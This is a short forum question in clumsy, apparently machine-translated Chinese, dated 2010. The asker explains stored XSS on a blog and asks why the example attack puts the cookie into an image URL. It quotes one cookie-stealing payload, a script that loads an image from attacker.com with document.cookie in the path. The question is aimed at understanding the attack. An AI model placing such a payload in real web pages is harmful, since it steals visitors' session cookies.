如同这里许多可能知道,目前的XSS攻击通常有两种形式: 1 - 攻击者上传标签公共bulliten板,博客,或其他网站 有XSS漏洞,并有很多其他用户将访问。攻击者通常 收成后用户模仿网站的Cookie,但表单提交和其他攻击 有时利用。这就是我所说的许多人认为XSS是。 下面是一个例子:
有人将张贴在evilblog.com以下,其他用户将处理
<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>
这将尽量拉的图像攻击者的服务器与用户的evilblog cookies在URL 。
我的问题:
我不明白上面被写图像URL路径的目的/结果。任何人都可以详细说明这一点吗?
PS:这是什么意思为“这会尽量拉的图像攻击者的服务器的URL用户的evilblog曲奇”
关于使用图像的透彻解释。谢谢。 – Ricky 2010-04-12 11:17:48